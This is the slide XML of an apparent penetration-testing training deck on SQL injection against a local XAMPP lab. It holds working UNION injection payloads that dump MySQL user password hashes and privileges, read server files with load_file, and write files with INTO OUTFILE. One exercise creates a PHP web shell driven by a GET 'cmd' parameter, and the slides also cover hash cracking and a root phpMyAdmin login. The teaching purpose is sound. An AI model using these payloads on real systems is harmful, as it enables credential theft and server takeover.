          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>www.cmd5.org</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="730" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5943600"/>
            <a:ext cx="2209320" cy="303480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>www.md5decryptor.co.uk</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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8381520" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Cracking tools – John the Ripper</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="733"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hashcat – GPU based cracker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="736"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457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="738"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4400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>Any other alternatives for post-exploitation?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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="0"/>
            <a:ext cx="8686440" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Check database privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="740"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grantee</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>privilege_type, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>is_grantable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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8229240" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,concat(grantee,0x3a,privilege_type,0x3a,is_grantable),3,4,5,6 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>information_schema.user_privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="742" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="743"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457200" y="228600"/>
            <a:ext cx="7772040" cy="4571640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Information gathering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4800600"/>
            <a:ext cx="6857640" cy="914040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292"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93"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94"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03882839-C769-4108-83E9-EDE2C40AA98C}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8381520" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,concat(user,0x3a,password),3,4,5,6 from mysql.user#</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="746"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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8229240" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Crack it using online crack site</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="748" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="749"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="7924320" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Login into phpMyAdmin (if any)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="751" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="752"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8152920" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Successfully login with root account</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="754" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="755"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8229240" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,load_file('C:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>xampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>htdocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>pentest.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>'),3,4,5,6#</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="758" name="Picture 6"/>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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8381520" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,load_file('C:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>xampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>htdocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>\\upload\\upload2\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>uploadfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>\\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>'),3,4,5,6#</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="761"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8229240" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,load_file('C:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>xampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>\\php.ini'),3,4,5,6#</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="763" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="764"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8381520" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>' union all select 1,'test',3,4,5,6 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t> 'test.txt'#</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="766" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="767"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="8686440" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Task 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
Create a new PHP file (test.php) using SQL syntax of “INTO OUTFILE”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Input : system() with pre-defined variable of GET method with “cmd” parameter.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Output : Output our file with the full path together with our code (input)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
